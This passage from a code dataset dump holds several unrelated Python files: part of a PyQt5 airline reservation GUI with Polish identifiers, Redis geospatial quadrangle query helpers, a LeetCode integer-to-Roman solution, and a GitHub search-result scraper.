self.przycisk_dodaj_lotniska.setObjectName(\"przycisk_dodaj_lotniska\")\n self.przycisk_dodaj_lotniska.clicked.connect(self.dodaj_lotniska)\n self.przycisk_dodaj_lotniska.setMinimumSize(QtCore.QSize(120,40))\n self.horizontalLayout_10.addWidget(self.przycisk_dodaj_lotniska)\n self.verticalLayout_6.addWidget(self.lotniska_dol)\n self.stos_tabel.addWidget(self.strona_lotniska)\n\n\n\n self.strona_loty = QtWidgets.QWidget()\n self.strona_loty.setObjectName(\"stron_loty\")\n self.verticalLayout_7 = QtWidgets.QVBoxLayout(self.strona_loty)\n self.verticalLayout_7.setContentsMargins(0, 0, 0, 0)\n self.verticalLayout_7.setSpacing(0)\n self.verticalLayout_7.setObjectName(\"verticalLayout_7\")\n self.loty_gora = QtWidgets.QFrame(self.strona_loty)\n self.loty_gora.setMinimumSize(QtCore.QSize(0, 80))\n self.loty_gora.setMaximumSize(QtCore.QSize(16777215, 80))\n self.loty_gora.setStyleSheet(\"background-color: rgb(53, 53, 53);border-radius:5px;\")\n self.loty_gora.setFrameShape(QtWidgets.QFrame.NoFrame)\n self.loty_gora.setFrameShadow(QtWidgets.QFrame.Sunken)\n self.loty_gora.setObjectName(\"loty_gora\")\n self.verticalLayout_17 = QtWidgets.QVBoxLayout(self.loty_gora)\n self.verticalLayout_17.setObjectName(\"verticalLayout_17\")\n self.napis_loty = QtWidgets.QLabel(self.loty_gora)\n font = QtGui.QFont()\n font.setFamily(\"Arial\")\n 
self.napis_loty.setFont(font)\n self.napis_loty.setObjectName(\"napis_loty\")\n self.verticalLayout_17.addWidget(self.napis_loty)\n self.verticalLayout_7.addWidget(self.loty_gora)\n self.loty_tabela = QtWidgets.QFrame(self.strona_loty)\n self.loty_tabela.setStyleSheet(\"background-color: rgb(217, 217, 217);\")\n self.loty_tabela.setFrameShape(QtWidgets.QFrame.NoFrame)\n self.loty_tabela.setFrameShadow(QtWidgets.QFrame.Raised)\n self.loty_tabela.setObjectName(\"loty_tabela\")\n self.horizontalLayout_12 = QtWidgets.QHBoxLayout(self.loty_tabela)\n self.horizontalLayout_12.setObjectName(\"horizontalLayout_12\")\n self.tabela_loty = QtWidgets.QTableWidget(self.loty_tabela)\n self.tabela_loty.setObjectName(\"tabela_loty\")\n\n font.setPointSize(12)\n self.tabela_loty.setFont(font)\n\n\n self.tabela_loty.setColumnCount(7)\n self.tabela_loty.setRowCount(1)\n item = QtWidgets.QTableWidgetItem()\n self.tabela_loty.setVerticalHeaderItem(0, item)\n item = QtWidgets.QTableWidgetItem()\n item = QtWidgets.QTableWidgetItem()\n font.setPointSize(12)\n item.setFont(font)\n self.tabela_loty.setColumnWidth(0,135)\n self.tabela_loty.setHorizontalHeaderItem(0, item)\n item = QtWidgets.QTableWidgetItem()\n font.setPointSize(12)\n item.setFont(font)\n self.tabela_loty.setColumnWidth(1,135)\n self.tabela_loty.setHorizontalHeaderItem(1, item)\n item = QtWidgets.QTableWidgetItem()\n font.setPointSize(12)\n item.setFont(font)\n self.tabela_loty.setColumnWidth(2,80)\n self.tabela_loty.setHorizontalHeaderItem(2, item)\n item = QtWidgets.QTableWidgetItem()\n font.setPointSize(12)\n item.setFont(font)\n self.tabela_loty.setColumnWidth(3,60)\n self.tabela_loty.setHorizontalHeaderItem(3, item)\n item = QtWidgets.QTableWidgetItem()\n font.setPointSize(12)\n item.setFont(font)\n self.tabela_loty.setColumnWidth(4,130)\n self.tabela_loty.setHorizontalHeaderItem(4, item)\n item = QtWidgets.QTableWidgetItem()\n font.setPointSize(12)\n item.setFont(font)\n self.tabela_loty.setColumnWidth(5,100)\n self.tabela_loty.setHorizontalHeaderItem(5, item)\n item = QtWidgets.QTableWidgetItem()\n font.setPointSize(12)\n item.setFont(font)\n self.tabela_loty.setColumnWidth(6,121)\n self.tabela_loty.setHorizontalHeaderItem(6, item)\n\n item = QtWidgets.QTableWidgetItem()\n self.tabela_loty.setItem(0, 0, item)\n\n self.horizontalLayout_12.addWidget(self.tabela_loty)\n self.verticalLayout_7.addWidget(self.loty_tabela)\n self.loty_dol = QtWidgets.QFrame(self.strona_loty)\n self.loty_dol.setMinimumSize(QtCore.QSize(0, 60))\n self.loty_dol.setMaximumSize(QtCore.QSize(16777215, 16777215))\n self.loty_dol.setStyleSheet(\"background-color: rgb(53, 53, 53);border-radius:5px;\")\n self.loty_dol.setFrameShape(QtWidgets.QFrame.StyledPanel)\n self.loty_dol.setFrameShadow(QtWidgets.QFrame.Raised)\n self.loty_dol.setObjectName(\"loty_dol\")\n self.horizontalLayout_11 = QtWidgets.QHBoxLayout(self.loty_dol)\n self.horizontalLayout_11.setContentsMargins(0, 0, 10, 0)\n self.horizontalLayout_11.setSpacing(10)\n self.horizontalLayout_11.setObjectName(\"horizontalLayout_11\")\n spacerItem4 = QtWidgets.QSpacerItem(268, 20, QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Minimum)\n self.horizontalLayout_11.addItem(spacerItem4)\n self.przycisk_usun_loty = QtWidgets.QPushButton(self.loty_dol)\n self.przycisk_usun_loty.setStyleSheet(\"QPushButton{\\nbackground-color: rgb(222, 105, 88);border:none;color:rgb(255,255,255);\\n}\\nQPushButton:hover{\\ncolor:rgb(0,0,0);background-color: rgb(255, 170, 0);\\n}\")\n 
self.przycisk_usun_loty.setObjectName(\"przycisk_usun_loty\")\n self.przycisk_usun_loty.clicked.connect(self.usun_loty)\n self.przycisk_usun_loty.setMinimumSize(QtCore.QSize(120,40))\n self.horizontalLayout_11.addWidget(self.przycisk_usun_loty)\n\n self.przycisk_dodaj_loty = QtWidgets.QPushButton(self.loty_dol)\n self.przycisk_dodaj_loty.setStyleSheet(\"QPushButton{\\nbackground-color: rgb(158, 182, 83);border:none;color:rgb(255,255,255);\\n}\\nQPushButton:hover{\\ncolor:rgb(0,0,0);background-color: rgb(255, 170, 0);\\n}\")\n self.przycisk_dodaj_loty.setObjectName(\"przycisk_dodaj_loty\")\n self.przycisk_dodaj_loty.clicked.connect(self.dodaj_loty)\n self.przycisk_dodaj_loty.setMinimumSize(QtCore.QSize(120,40))\n\n self.przycisk_rezerwacje = QtWidgets.QPushButton(self.loty_dol)\n self.przycisk_rezerwacje.setStyleSheet(\"QPushButton{\\nbackground-color: rgb(98, 174, 163);border:none;color:rgb(255,255,255);\\n}\\nQPushButton:hover{\\ncolor:rgb(0,0,0);background-color: rgb(255, 170, 0);\\n}\")\n self.przycisk_rezerwacje.setObjectName(\"przycisk_rezerwacje\")\n self.przycisk_rezerwacje.clicked.connect(self.rezerwacja_click)\n self.przycisk_rezerwacje.setMinimumSize(QtCore.QSize(120,40))\n self.horizontalLayout_11.addWidget(self.przycisk_rezerwacje)\n\n\n self.horizontalLayout_11.addWidget(self.przycisk_dodaj_loty)\n self.verticalLayout_7.addWidget(self.loty_dol)\n self.stos_tabel.addWidget(self.strona_loty)\n self.verticalLayout_3.addWidget(self.stos_tabel)\n self.verticalLayout_2.addWidget(self.miejsce_na_stos)\n self.horizontalLayout.addWidget(self.prawa_ramka)\n System_rezerwacji_biletow.setCentralWidget(self.glowny)\n\n self.retranslateUi(System_rezerwacji_biletow)\n self.stos_tabel.setCurrentIndex(1)\n QtCore.QMetaObject.connectSlotsByName(System_rezerwacji_biletow)\n\n self.stos_tabel.setCurrentWidget(self.strona_klienci)\n self.tabela_klienci.setRowCount(len(self.system.get_klienci()))\n for i in range(len(self.system.get_klienci())):\n self.tabela_klienci.setItem(i, 0, QtWidgets.QTableWidgetItem(self.system.get_klienci()[i].get_imie()))\n self.tabela_klienci.setItem(i, 1, QtWidgets.QTableWidgetItem(self.system.get_klienci()[i].get_nazwisko()))\n self.tabela_klienci.setItem(i, 2, QtWidgets.QTableWidgetItem(self.system.get_klienci()[i].get_pesel()))\n\n def retranslateUi(self, System_rezerwacji_biletow):\n _translate = QtCore.QCoreApplication.translate\n System_rezerwacji_biletow.setWindowTitle(_translate(\"System_rezerwacji_biletow\", \"System rezerwacji biletow\"))\n self.przycisk_klienci.setText(_translate(\"System_rezerwacji_biletow\", \"Klienci\"))\n self.przycisk_samoloty.setText(_translate(\"System_rezerwacji_biletow\", \"Samoloty\"))\n self.przysick_trasy.setText(_translate(\"System_rezerwacji_biletow\", \"Trasy\"))\n self.przycisk_lotniska.setText(_translate(\"System_rezerwacji_biletow\", \"Lotniska\"))\n self.przycisk_loty.setText(_translate(\"System_rezerwacji_biletow\", \"Loty\"))\n self.przycisk_rezerwacje.setText(_translate(\"System_rezerwacji_biletow\", \"Rezerwacja\"))\n self.przycisk_zapis.setText(_translate(\"System_rezerwacji_biletow\", \"Zapis\"))\n self.przysick_odczyt.setText(_translate(\"System_rezerwacji_biletow\", \"Odczyt\"))\n self.napis_klienci.setText(_translate(\"System_rezerwacji_biletow\", \"
Klienci
\"))\n item = self.tabela_klienci.verticalHeaderItem(0)\n item.setText(_translate(\"System_rezerwacji_biletow\", \"1\"))\n item = self.tabela_klienci.horizontalHeaderItem(0)\n item.setText(_translate(\"System_rezerwacji_biletow\", \"Imie/Nazwa\"))\n item = self.tabela_klienci.horizontalHeaderItem(1)\n item.setText(_translate(\"System_rezerwacji_biletow\", \"Nazwisko\"))\n item = self.tabela_klienci.horizontalHeaderItem(2)\n item.setText(_translate(\"System_rezerwacji_biletow\", \"Pesel/Nip\"))\n self.przycisk_usun_klienci.setText(_translate(\"System_rezerwacji_biletow\", \"Usuń\"))\n self.przycisk_dodaj_klienci.setText(_translate(\"System_rezerwacji_biletow\", \"Dodaj\"))\n self.napis_samoloty.setText(_translate(\"System_rezerwacji_biletow\", \"
Samoloty
\"))\n item = self.tabela_samoloty.verticalHeaderItem(0)\n item.setText(_translate(\"System_rezerwacji_biletow\", \"1\"))\n item = self.tabela_samoloty.horizontalHeaderItem(0)\n item.setText(_translate(\"System_rezerwacji_biletow\", \"Rodzaj samolotu\"))\n self.przycisk_usun_samoloty.setText(_translate(\"System_rezerwacji_biletow\", \"Usuń\"))\n self.przycisk_dodaj_samoloty.setText(_translate(\"System_rezerwacji_biletow\", \"Dodaj\"))\n self.napis_trasy.setText(_translate(\"System_rezerwacji_biletow\", \"
Trasy
\"))\n item = self.tabela_trasy.verticalHeaderItem(0)\n item.setText(_translate(\"System_rezerwacji_biletow\", \"1\"))\n item = self.tabela_trasy.horizontalHeaderItem(0)\n item.setText(_translate(\"System_rezerwacji_biletow\", \"Punkt startowy\"))\n item = self.tabela_trasy.horizontalHeaderItem(1)\n item.setText(_translate(\"System_rezerwacji_biletow\", \"Punkt docelowy\"))\n item = self.tabela_trasy.horizontalHeaderItem(2)\n item.setText(_translate(\"System_rezerwacji_biletow\", \"Odległość\"))\n item = self.tabela_trasy.horizontalHeaderItem(3)\n item.setText(_translate(\"System_rezerwacji_biletow\", \"Czas\"))\n self.przycisk_usun.setText(_translate(\"System_rezerwacji_biletow\", \"Usuń\"))\n self.przycisk_dodaj.setText(_translate(\"System_rezerwacji_biletow\", \"Dodaj\"))\n self.napis_lotniska.setText(_translate(\"System_rezerwacji_biletow\", \"
Lotniska
\"))\n item = self.tabela_lotniska.verticalHeaderItem(0)\n item.setText(_translate(\"System_rezerwacji_biletow\", \"1\"))\n item = self.tabela_lotniska.horizontalHeaderItem(0)\n item.setText(_translate(\"System_rezerwacji_biletow\", \"Miasto\"))\n item = self.tabela_lotniska.horizontalHeaderItem(1)\n item.setText(_translate(\"System_rezerwacji_biletow\", \"Państwo\"))\n self.przycisk_usun_lotniska.setText(_translate(\"System_rezerwacji_biletow\", \"Usuń\"))\n self.przycisk_dodaj_lotniska.setText(_translate(\"System_rezerwacji_biletow\", \"Dodaj\"))\n self.napis_loty.setText(_translate(\"System_rezerwacji_biletow\", \"
Loty
\"))\n item = self.tabela_loty.verticalHeaderItem(0)\n item.setText(_translate(\"System_rezerwacji_biletow\", \"1\"))\n item = self.tabela_loty.horizontalHeaderItem(0)\n item.setText(_translate(\"System_rezerwacji_biletow\", \"Punkt Startowy\"))\n item = self.tabela_loty.horizontalHeaderItem(1)\n item.setText(_translate(\"System_rezerwacji_biletow\", \"Punkt Docelowy\"))\n item = self.tabela_loty.horizontalHeaderItem(2)\n item.setText(_translate(\"System_rezerwacji_biletow\", \"Długość\"))\n item = self.tabela_loty.horizontalHeaderItem(3)\n item.setText(_translate(\"System_rezerwacji_biletow\", \"Czas\"))\n item = self.tabela_loty.horizontalHeaderItem(4)\n item.setText(_translate(\"System_rezerwacji_biletow\", \"Rodzaj Samolotu\"))\n item = self.tabela_loty.horizontalHeaderItem(5)\n item.setText(_translate(\"System_rezerwacji_biletow\", \"Data\"))\n item = self.tabela_loty.horizontalHeaderItem(6)\n item.setText(_translate(\"System_rezerwacji_biletow\", \"miejsca zaj/max\"))\n\n self.przycisk_usun_loty.setText(_translate(\"System_rezerwacji_biletow\", \"Usuń\"))\n self.przycisk_dodaj_loty.setText(_translate(\"System_rezerwacji_biletow\", \"Dodaj\"))\n\n def przycisk_klienci_click(self):\n self.stos_tabel.setCurrentWidget(self.strona_klienci)\n self.tabela_klienci.setRowCount(len(self.system.get_klienci()))\n for i in range(len(self.system.get_klienci())):\n self.tabela_klienci.setItem(i, 0, QtWidgets.QTableWidgetItem(self.system.get_klienci()[i].get_imie()))\n self.tabela_klienci.setItem(i, 1, QtWidgets.QTableWidgetItem(self.system.get_klienci()[i].get_nazwisko()))\n self.tabela_klienci.setItem(i, 2, QtWidgets.QTableWidgetItem(self.system.get_klienci()[i].get_pesel()))\n\n def przycisk_samoloty_click(self):\n self.stos_tabel.setCurrentWidget(self.strona_samoloty)\n self.tabela_samoloty.setRowCount(len(self.system.get_samoloty()))\n for i in range(len(self.system.get_samoloty())):\n self.tabela_samoloty.setItem(i,0,QtWidgets.QTableWidgetItem(self.system.get_samoloty()[i].__str__()))\n\n def przycisk_trasy_click(self):\n self.stos_tabel.setCurrentWidget(self.strona_trasy)\n self.tabela_trasy.setRowCount(len(self.system.get_trasy()))\n for i in range(len(self.system.get_trasy())):\n self.tabela_trasy.setItem(i,0,QtWidgets.QTableWidgetItem(str(self.system.get_trasy()[i].get_lotniska_w_trasy()[0])))\n self.tabela_trasy.setItem(i,1,QtWidgets.QTableWidgetItem(str(self.system.get_trasy()[i].get_lotniska_w_trasy()[1])))\n self.tabela_trasy.setItem(i,2,QtWidgets.QTableWidgetItem(str(self.system.get_trasy()[i].get_czas())+\" km\"))\n self.tabela_trasy.setItem(i,3,QtWidgets.QTableWidgetItem(str(self.system.get_trasy()[i].get_odleglosc())+\" min\"))\n\n\n def przycisk_lotniska_click(self):\n self.stos_tabel.setCurrentWidget(self.strona_lotniska)\n self.tabela_lotniska.setRowCount(len(self.system.get_lotniska()))\n for i in range(len(self.system.get_lotniska())):\n self.tabela_lotniska.setItem(i,0,QtWidgets.QTableWidgetItem(self.system.get_lotniska()[i].get_miasto()))\n self.tabela_lotniska.setItem(i,1,QtWidgets.QTableWidgetItem(self.system.get_lotniska()[i].get_panstwo()))\n\n def przycisk_loty_click(self):\n self.stos_tabel.setCurrentWidget(self.strona_loty)\n self.tabela_loty.setRowCount(len(self.system.get_loty()))\n\n for i in range(len(self.system.get_loty())):\n self.tabela_loty.setItem(i,0,QtWidgets.QTableWidgetItem(str(self.system.get_loty()[i].get_trasa().get_lotniska_w_trasy()[0])))\n 
self.tabela_loty.setItem(i,1,QtWidgets.QTableWidgetItem(str(self.system.get_loty()[i].get_trasa().get_lotniska_w_trasy()[1])))\n self.tabela_loty.setItem(i,2,QtWidgets.QTableWidgetItem(str(self.system.get_loty()[i].get_trasa().get_czas())))\n self.tabela_loty.setItem(i,3,QtWidgets.QTableWidgetItem(str(self.system.get_loty()[i].get_trasa().get_odleglosc())))\n self.tabela_loty.setItem(i,4,QtWidgets.QTableWidgetItem(str(self.system.get_loty()[i].get_samolot())))\n self.tabela_loty.setItem(i,5,QtWidgets.QTableWidgetItem(str(self.system.get_loty()[i].get_data())))\n self.tabela_loty.setItem(i,6,QtWidgets.QTableWidgetItem(str(self.system.get_loty()[i].get_zajete())+\"/\"+str(self.system.get_loty()[i].get_samolot().get_miejsca())))\n\n\n def rezerwacja_click(self):\n Dialog = QtWidgets.QDialog()\n ui = menu_rezerwacja(self.system)\n ui.setupUi(Dialog)\n Dialog.show()\n Dialog.exec_()\n self.przycisk_loty_click()\n\n def przycisk_zapis_click(self):\n\n Dialog = QtWidgets.QDialog()\n ui = Ui_Dialog_2()\n ui.setupUi(Dialog)\n Dialog.show()\n Dialog.exec_()\n self.system.zapisz_wszystko()\n\n def przycisk_odczyt_click(self):\n Dialog = QtWidgets.QDialog()\n ui = Ui_Dialog(self.system)\n ui.setupUi(Dialog)\n Dialog.show()\n Dialog.exec_()\n\n def dodaj_klienci(self):\n Dialog = QtWidgets.QDialog()\n ui = Menu_klient(self.system)\n ui.setupUi(Dialog)\n Dialog.show()\n Dialog.exec_()\n self.przycisk_klienci_click()\n\n def usun_klienci(self):\n usuwanie = QtWidgets.QDialog()\n ui = Ui_usuwanie(self.system,1)\n ui.setupUi(usuwanie)\n usuwanie.show()\n usuwanie.exec_()\n self.przycisk_klienci_click()\n\n def dodaj_samoloty(self):\n Dialog = QtWidgets.QDialog()\n ui = menu_samoloty(self.system)\n ui.setupUi(Dialog)\n Dialog.show()\n Dialog.exec_()\n self.przycisk_samoloty_click()\n\n def usun_samoloty(self):\n usuwanie = QtWidgets.QDialog()\n ui = Ui_usuwanie(self.system,2)\n ui.setupUi(usuwanie)\n usuwanie.show()\n usuwanie.exec_()\n self.przycisk_samoloty_click()\n\n def dodaj_trasy(self):\n menu_trasy = QtWidgets.QDialog()\n ui = Ui_menu_trasy(self.system)\n ui.setupUi(menu_trasy)\n menu_trasy.show()\n menu_trasy.exec_()\n self.przycisk_trasy_click()\n\n def usun_trasy(self):\n usuwanie = QtWidgets.QDialog()\n ui = Ui_usuwanie(self.system,3)\n ui.setupUi(usuwanie)\n usuwanie.show()\n usuwanie.exec_()\n self.przycisk_trasy_click()\n\n def dodaj_lotniska(self):\n dodawani_lotniska = QtWidgets.QDialog()\n ui = Ui_dodawani_lotniska(self.system)\n ui.setupUi(dodawani_lotniska)\n dodawani_lotniska.show()\n dodawani_lotniska.exec_()\n self.przycisk_lotniska_click()\n\n def usun_lotniska(self):\n usuwanie = QtWidgets.QDialog()\n ui = Ui_usuwanie(self.system,4)\n ui.setupUi(usuwanie)\n usuwanie.show()\n usuwanie.exec_()\n self.przycisk_lotniska_click()\n\n def dodaj_loty(self):\n menuloty = QtWidgets.QDialog()\n ui = Ui_menuloty(self.system)\n ui.setupUi(menuloty)\n menuloty.show()\n menuloty.exec_()\n self.przycisk_loty_click()\n\n def usun_loty(self):\n usuwanie = QtWidgets.QDialog()\n ui = Ui_usuwanie(self.system,5)\n ui.setupUi(usuwanie)\n usuwanie.show()\n usuwanie.exec_()\n self.przycisk_loty_click()\n\n def animacja(self):\n self.anim = QPropertyAnimation(self.lewa_ramka,b\"minimumWidth\")\n self.anim.setDuration(400)\n if self.lewa_ramka.width() == 400:\n self.anim.setStartValue(400)\n self.anim.setEndValue(120)\n self.przycisk_klienci.setText(\"\")\n self.przycisk_samoloty.setText(\"\")\n self.przysick_trasy.setText(\"\")\n self.przycisk_lotniska.setText(\"\")\n self.przycisk_loty.setText(\"\")\n 
self.przysick_odczyt.hide()\n        else:\n            self.anim.setStartValue(120)\n            self.anim.setEndValue(400)\n            self.przycisk_klienci.setText(\"Klienci\")\n            self.przycisk_samoloty.setText(\"Samoloty\")\n            self.przysick_trasy.setText(\"Trasy\")\n            self.przycisk_lotniska.setText(\"Lotniska\")\n            self.przycisk_loty.setText(\"Loty\")\n            self.przysick_odczyt.show()\n        self.anim.start()\n","repo_name":"Bluefish5/Database-Airplane-System","sub_path":"modules/menu.py","file_name":"menu.py","file_ext":"py","file_size_in_byte":52073,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"74968765847","text":"from haversine import haversine, Unit\nfrom math import floor\n\ndef sequence_number(size,p):\n    λ, ϕ = p\n    λ_s, φ_s = size if type(size)==tuple else (size,size)\n\n    λ_p, φ_p = (90 - λ, 360 + ϕ if ϕ < 0 else ϕ)\n\n    s = floor(λ_p / λ_s) * floor(360.0 / φ_s) + floor(φ_p / φ_s) + 1\n\n    return s\n\ndef sequence_partitions(size):\n    λ_s, φ_s = size if type(size)==tuple else (size,size)\n    N_λ = floor(180 / λ_s)\n    N_φ = floor(360 / φ_s)\n    return N_λ, N_φ\n\ndef quadrangle_for_sequence_number(size,s):\n    λ_s, φ_s = size if type(size)==tuple else (size,size)\n\n    N_λ, N_φ = sequence_partitions(size)\n\n    z = (s - 1) % (N_λ * N_φ)\n    φ_p = (z % N_φ) * φ_s\n    nw = (90 - floor(z / N_φ) * λ_s, φ_p - 360 if φ_p > 180 else φ_p)\n    se = (nw[0] - λ_s, nw[1] + φ_s)\n    return [nw,se]\n\ndef is_valid_datetime_partition(partition,t):\n    # the timestamp must be a whole minute that aligns with the partition size\n    if t.second!=0 or \\\n       t.microsecond!=0 or \\\n       t.minute % partition != 0:\n        return False\n    return True\n\ndef sequence_numbers_for_bounds(size,*args):\n    if len(args)==1:\n        nw = args[0][0]\n        se = args[0][1]\n    elif len(args)==2:\n        nw = args[0]\n        se = args[1]\n    else:\n        raise ValueError('Unexpected number of bounds arguments: '+str(len(args)))\n    p = 0.00000000001  # small epsilon that keeps the south/east edges exclusive\n    s_nw = sequence_number(size,nw)\n    s_ne = sequence_number(size,(nw[0],se[1]-p))\n    if s_ne < s_nw:\n        # bounds cross the antimeridian: split into two queries and stop here\n        for s in sequence_numbers_for_bounds(size,nw,(se[0],-p)):\n            yield s\n        for s in sequence_numbers_for_bounds(size,(nw[0],p),se):\n            yield s\n        return\n    width = s_ne - s_nw + 1\n    N_λ, N_φ = sequence_partitions(size)\n\n    s_se = sequence_number(size,(se[0]-p,se[1]-p))\n    current = s_nw\n    while current <= s_se:\n        row_start = current\n        for _ in range(width):\n            yield current\n            current += 1\n        current = row_start + N_φ\n\ndef quadrangles_for_bounds(size,*args):\n    λ_s, φ_s = size if type(size)==tuple else (size,size)\n    if len(args)==1:\n        nw = args[0][0]\n        se = args[0][1]\n    elif len(args)==2:\n        nw = args[0]\n        se = args[1]\n    else:\n        raise ValueError('Unexpected number of bounds arguments: '+str(len(args)))\n\n    # TODO: does not handle crossing lon=0\n    p = 0.00000000001\n    nw_quadrangle = quadrangle_for_sequence_number(size,sequence_number(size,nw))\n    se_quadrangle = quadrangle_for_sequence_number(size,sequence_number(size,(se[0]-p,se[1]-p)))\n\n    current = [nw_quadrangle[0],nw_quadrangle[1]]\n\n    while current[0][0] > se_quadrangle[1][0]:\n        yield current\n\n        if current[0][1] + φ_s >= se_quadrangle[1][1]:\n            current[0] = (current[0][0] - λ_s, nw_quadrangle[0][1])\n            current[1] = (current[1][0] - λ_s, current[0][1] + φ_s)\n        else:\n            current[0] = (current[0][0], current[0][1] + φ_s)\n            current[1] = (current[1][0], current[1][1] + φ_s)\n\ndef query_circle(client, partition_key, center, radius, unit='km', bounds=None):\n    \"\"\"\n    Iterates the values that fall within the defined circle\n    for the geospatial key.\n\n    Arguments:\n    client - the Redis client instance\n    partition_key - the geospatial set key\n    center - the center of the circle 
as a tuple/list (lat,lon)\n    radius - the radius of the circle\n    unit - the unit of measure for the radius (defaults to km)\n    bounds - A bounding box to clip the results (defaults to None)\n    \"\"\"\n    # note: query is lon,lat\n    result = client.georadius(partition_key,center[1],center[0],radius,unit=unit,withcoord=True)\n\n    nw = bounds[0] if bounds is not None else None\n    se = bounds[1] if bounds is not None else None\n\n    for key, pos in result:\n\n        # Note: pos is lon, lat\n\n        lat = pos[1]\n        lon = pos[0]\n\n        # check boundary (parenthesized so the bounds-is-None case short-circuits correctly)\n        if bounds is not None and (lat >= nw[0] or lat <= se[0] or lon <= nw[1] or lon >= se[1]):\n            continue\n\n        yield key, (lat,lon)\n\ndef query_quadrangle(client, partition_key, *args):\n    \"\"\"\n    Iterates the values that fall within the defined quadrangle\n    for the geospatial key.\n\n    Arguments:\n    client - the Redis client instance\n    partition_key - the geospatial set key\n    bounds - the bounds as an array of [nw,se]\n    - or -\n    nw - the north west corner of the quadrangle as a tuple/list (lat,lon)\n    se - the south east corner of the quadrangle as a tuple/list (lat,lon)\n    \"\"\"\n\n    if len(args)==1:\n        nw = args[0][0]\n        se = args[0][1]\n    elif len(args)==2:\n        nw = args[0]\n        se = args[1]\n    else:\n        raise ValueError('Too many arguments after client and key: '+str(len(args)))\n\n    lat_size = abs(nw[0] - se[0])\n    lon_size = abs(nw[1] - se[1])\n\n    # inscribe the quadrangle onto a circle with radius from the center to a corner\n    center = (nw[0] - lat_size/2, nw[1] + lon_size/2)\n    radius = haversine(center,nw,unit=Unit.KILOMETERS)\n\n    return query_circle(client,partition_key,center,radius,bounds=[nw,se])\n\ndef query_region(client,partition_key,*args,size=0.5,by_quadrangles=False):\n    if len(args)==1:\n        nw = args[0][0]\n        se = args[0][1]\n    elif len(args)==2:\n        nw = args[0]\n        se = args[1]\n    else:\n        raise ValueError('Too many arguments after client and key: '+str(len(args)))\n\n    if by_quadrangles:\n        for quadrangle in quadrangles_for_bounds(size,nw,se):\n            for key, pos in query_quadrangle(client,partition_key,quadrangle):\n\n                lat = pos[0]\n                lon = pos[1]\n\n                # check boundary\n                if lat >= nw[0] or lat <= se[0] or lon <= nw[1] or lon >= se[1]:\n                    #print(pos)\n                    continue\n\n                yield key, pos\n    else:\n        for sequence_number in sequence_numbers_for_bounds(size,nw,se):\n\n            q_nw, q_se = quadrangle_for_sequence_number(size,sequence_number)\n\n            for key, pos in query_quadrangle(client,partition_key,q_nw,q_se):\n\n                lat = pos[0]\n                lon = pos[1]\n\n                # check boundary\n                if lat >= nw[0] or lat <= se[0] or lon <= nw[1] or lon >= se[1]:\n                    #print(pos)\n                    continue\n\n                yield key, pos\n","repo_name":"alexmilowski/redis-aqi","sub_path":"geo.py","file_name":"geo.py","file_ext":"py","file_size_in_byte":5954,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"31"} +{"seq_id":"69869678807","text":"#\n# @lc app=leetcode.cn id=12 lang=python3\n#\n# [12] Integer to Roman\n#\n\n# @lc code=start\nclass Solution:\n    def intToRoman(self, num: int) -> str:\n        length = len(str(num))\n        roma = [(\"M\", \"\", \"\"), (\"C\", \"D\", \"M\"), (\"X\", \"L\", \"C\"), (\"I\", \"V\", \"X\")]\n        roma = roma[-length:]\n        ans = \"\"\n        for i in range(length):\n            if length - i - 1 == 0:\n                number = num\n            else:\n                number = num // 10**(length-i-1)\n            a, b, c = roma[i]\n            if number == 0:\n                continue\n            elif number <= 3:\n                ans += a*number\n            elif number == 4:\n                ans += a + b\n            elif number <= 8:\n                ans += b + a*(number-5)\n            else:\n                ans += a + c\n            num = num % 10**(length-i-1)\n        return ans\n\n\n# @lc code=end\nS = Solution()\nnum = 
1994\nprint(S.intToRoman(num))\n","repo_name":"mkroen/mkleetcode","sub_path":"leetcode/12.整数转罗马数字.py","file_name":"12.整数转罗马数字.py","file_ext":"py","file_size_in_byte":926,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"31"} +{"seq_id":"14231542599","text":"import requests\nfrom requests.exceptions import Timeout\nimport random\nfrom bs4 import BeautifulSoup\n\n\nclass Service:\n def __init__(self):\n self.base_url = \"https://github.com\"\n\n def scrape_results_urls(self, request_parameters):\n try:\n url = self.prepare_search_url(request_parameters)\n github_response = self.make_request(url, request_parameters[\"proxies\"])\n github_content = self.get_page_content(github_response)\n urls = self.extract_content(github_content, request_parameters[\"type\"])\n full_urls = self.add_base_url(urls)\n return full_urls\n except requests.exceptions.ProxyError as err:\n return err\n except Timeout as err:\n return err\n\n def prepare_search_url(self, request_parameters):\n formatted_keywords = self.format_keywords(request_parameters[\"keywords\"])\n search_type = request_parameters[\"type\"]\n url = \"{}/search?utf8=✓&q={}&type={}\".format(self.base_url, formatted_keywords, search_type)\n return url\n\n def make_request(self, url, proxies):\n proxies_dict = {\"http\": self.random_proxy(proxies), \"https\": self.random_proxy(proxies)}\n github_response = requests.get(url, proxies=proxies_dict, timeout=10)\n return github_response\n\n def get_page_content(self, github_response):\n github_html = github_response.content\n return github_html\n\n def format_keywords(self, keywords_list):\n return '+'.join(keywords_list)\n\n def random_proxy(self, proxies):\n return random.choice(proxies)\n\n def extract_content(self, response_content, search_type):\n soup = BeautifulSoup(response_content, 'html.parser')\n if search_type.lower() == \"repositories\":\n return self.extract_repositories_path(soup)\n elif search_type.lower() == \"issues\":\n return self.extract_issues_path(soup)\n elif search_type.lower() == \"wikis\":\n return self.extract_wikis_path(soup)\n else:\n return None\n\n def extract_repositories_path(self, soup):\n repos = []\n for repo_el in soup.findAll('ul', {'class': 'repo-list'}):\n for a in repo_el.findAll(\"a\", {'class': 'v-align-middle'}):\n repos.append(a.get(\"href\"))\n return repos\n\n def extract_wikis_path(self, soup):\n wikis = []\n for wiki_el in soup.findAll('div', {'id': 'wiki_search_results'}):\n for a in wiki_el.findAll(\"a\", class_=False):\n href = a.get(\"href\")\n if \"/wiki/\" in href:\n wikis.append(a.get(\"href\"))\n return wikis\n\n def extract_issues_path(self, soup):\n wikis = []\n for wiki_el in soup.findAll('div', {'id': 'issue_search_results'}):\n for a in wiki_el.findAll(\"a\", class_=False):\n href = a.get(\"href\")\n if \"/issues/\" in href or \"/pull/\" in href:\n wikis.append(href)\n return wikis\n\n def add_base_url(self, repo_urls):\n full_urls = [self.base_url + url for url in repo_urls]\n return 